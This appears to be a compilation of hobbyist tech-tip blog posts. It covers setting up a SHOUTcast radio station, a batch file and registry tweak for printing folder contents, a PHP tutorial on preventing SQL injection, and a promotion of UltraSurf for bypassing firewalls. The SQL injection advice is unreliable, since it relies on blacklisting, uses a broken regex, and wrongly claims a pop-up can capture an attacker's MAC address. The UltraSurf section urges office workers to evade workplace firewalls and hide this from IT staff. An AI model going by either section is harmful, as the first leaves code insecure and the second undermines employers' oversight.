• Any version of Winamp . Get it here
• SHOUTCAST Radio Tools
• Internet connection
• Your own Domain

Firstly,your internet speed has to be at least 64 kbps or above (which means Dial-up users, who will be having a lot of latency, will not be able to setup) . Secondly,you going to have to have a domain, an updated one with the current IP active.

Download the Shoutcast files and install them in any order.

Now navigate to

START > PROGRAM FILES > SHOUTcast DNAS > EDIT SHOUTCAST DNS CONFIG.

Configuring Shoutcast -

• Go Down and where it says Password : change (set it something you can remember..duh.)
• The Portbase : change it to whatever port you want it
• Maxusers : (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles your fantasy.

EDIT > SAVE

• Now Open winamp and right click it or press ctrl + P

RIGHT CLICK > OPTIONS > PREFRENCES > DSP EFFECT > and choose the NULLSOFT SHOUTCAST.

• Now Go to OUTPUT, and then click on Connection.
• Through the ADDRESS, type your address which you have done through www.no-ip.com, PORT NUMBER, whatever u did in the EDIT.txt, and your password.
• Then go to Encoder, and choose your quality of your music.
• Now Go back to

OUTPUT > OUTPUT CONFIG > YELLOW PAGES

This is your advertisement information. Write whatever you like there.

Now Connect. To check that your Radio on-line go to http://(your address that you added in the preference).

Cheers,you have successfully created your own radio station,tell others about it to tune into it and enjoy…

Cheers and Keep learning.

Add an Option to Print Contents of a Folder

Would you like to be able to right click any folder in Explorer and print its contents? You can add this option to the context menu by following these steps:

First, you need to create a batch file called Printdir.bat .

• Open Notepad or another text editor and type (or cut and paste) this text:

@echo off
dir %1 /-p /o:gn > "%temp%\Listing"
start /w notepad /p "%temp%\Listing"
del "%temp%\Listing"
exit

• Now, in the Save As dialog box, type " %windir%\Printdir.bat " (without the quotation marks) and click the Save button.
• Click Start, Control Panel, Folder Options.
• Click the File Types tab, and then click File Folder.
• Click the Advanced button.
• Click the New button.
• In the Action box, type "Print Directory Listing" (without the quotation marks).
• In the Application used to perform action box, type "Printdir.bat" (without the quotation marks).
• Click OK in all three dialog boxes to close the dialog boxes.

You're not quite finished yet! Now you need to edit the Registry, so open your favorite Registry Editor.

• Navigate to HKEY CLASSES ROOT\Directory\shell.
• Right click on "default" and select Modify.In the File Data box, type "none" (without the quotation marks).
• Click OK and close the Registry Editor.
• Now when you right click a folder, you'll see the option to Print Directory Listing .Selecting it will print the contents of the folder.

Who needs a program to print a folder directory ? Its easy and its tech savvy.

Keep learning.

Exploiting SQL Injection “ Attack “ - By Chintan Gurjar

Hi Geeks,Lets start with the tutorial.Before starting I am dam sure that most of you didn’t understood the question.

Exploiting the SQL injection Attack

Meaning :- This shows that how we can exploit SQL injction “Attack”.I am not going to show you that how one can attack a website with “SQL Injection Attack.”But here I specified “Attack” word in the title.Which shows that we are attacking the SQL injection “Attack”.Means We are going to protect our website by being attacked from the hackers,who are attacking our site with SQL injection.So here I want to show you that how we can do secure coding.

For that we need some good coders with the bit knowledge of attack methods of vulnrability.Because now a days if any coder gets job,he started doing coding without watchin security matter.

Bascially we can eliminate the vulnerability by 2 methods.

1.Input Validation Coding :-

Here I am talking about the validation.Normal validation that coder makes on to the register page or any other page.This method is very simple,less time and brain consuming and also more effective.I don’t know I am right or wrong but as per my thinking this method prevents the SQL injection attack 55% to 65%.

Lets see with example.

If any site has a detail of customer.Then If i have made this information page of customer named “cust_info”.This is the normal page but if any particular customer logged in the I must have given any particular ID(Integer).

Suppose if I am CHINTAN the customer and my id is 26543 then my page will work like this.

http://www.domain.com/customers/cust_info.php?id=26543

This id 26543 shows particular my info.

So basically here is the GET request.Input number is going to input in this GET request.So we can give here security by adding one type checking IF condetition.Like this,

Function :- is_numeric

Example :-

if(is_numeric($cust_info))

{

Statment;

}

Else

Statement ;

Where statement is the => Give acceptance to it.Or This is valid and further processing is to be done.Redirection or response or anything esle.

For further information visit here,

http://php.net/manual/en/function.is-numeric.php

OK.Lets consider the other senerio.As i have given that my ID is 26543.So it will always be 5 characters for my id.Which will remain same as it is for a long time until and if the site got changes.So we can also put another security by adding another PHP function.Like this,

Function :- preg_match

Example :-

If(preg_match(‘\d{4}’,$entry))

{

Statement;

}

Else

Statement ;

Where statement will be like this.IF the values are true then we can take action by defining the statement.Like redirection.Connection lost in the case of value dont get true.Or Redirection to 404.php

For more detail about function go here,

http://in.php.net/manual/en/function.preg-match.php

2.Not Allowing Special Characters :-

The sensitive part of the website like search box and all that where mostly attacker gives this type of special character for attacking with SQL and XSS.

‘

/

<

>

etc..

So if in coding we are blocking this type of character to input no 1 even will able to input such characters neither in that particular box nor from URL.So how will he check that its vulnerable or not?So we can be secrured.

Another Handy trick that we can do is this.

Server’s coding should do in such a way that if any attacker puts this type of special characters to attack,then rather to redirect on 404.php(if result has not come),it should redirect on a page which displays a POPup with the message that “your original IP address and the MAC adress has been fetched up.This was the trap.”So if any attacker even finds the vulnerability he wont even think to exploit it again after seeing this msg.

So,far as I am the PHP developer I know about this function so made tutorial to prevent SQL injection on PHP sites.I am assuming that there may be functions like this in .NET and JAVA.So, one must use it to secure site by coading.Why to pay extra money to security analyst if PHP is giving such a good inbult functions like these.

Ultra Surf: Bypass firewall and proxies–World’s best bypass technology

what exactly it is?
It is the flagship software product from UltraReach Internet Corp. for Internet anti-censorship. It enables users inside countries with heavy Internet censorship to visit any public web sites in the world safely and freely. it enables users to browse any website freely just the same as using the regular IE browser while it automatically searches the highest speed proxy servers in the background.

What does it means??

• 100% freedom to have 100% information in most secure way.
• It means no matter where you are you can access 100% free version of internet I mean no firewalls no restriction nothing….
• Almost all schools, universities and corporate offices raise firewalls to filter out not work related sites, now those firewalls will be of no use or they have to change their plans.
• Everybody can access various social networks like Orkut, Youtube, Myspace, Hi5,Facebook, Linkedin etc. which are blocked almost in 99% schools and offices.
• 100% real time and it’s encryption is better then any online banking system.
  

How to get going??
It’s very simple you have to just-

• download an exe file
• then extract it
• and run
• Set proxy if u have any (generally in offices internet are provided through proxies, you can find that, through tools>>internet options>>Connections>>LAN Settings>> there you are with proxy server for your LAN and it’s port
• Just copy that to proxy settings of Ultrasurf.
• Then a window will pop up, says some thing in Chinese, just close this window
• And open fresh internet explorer
• There you are, you can surf any information.
• For office people: beware don’t spread words to your colleagues keep this info as limited as you can, coz if system people got to know about it then they’ll take your comp for scrutinizing.

Useful tips:

When u download fresh version u need to tweak proxy settings of Ultra Surf. do that manually, also sometimes proxy setting of Ultra Surf get vanished automatically.. do check for proxy setting and feed it manually. For any kind of browser Proxy IP address is 127.0.0.1 with port :9666 and For Ultra Surf it depends upon your network.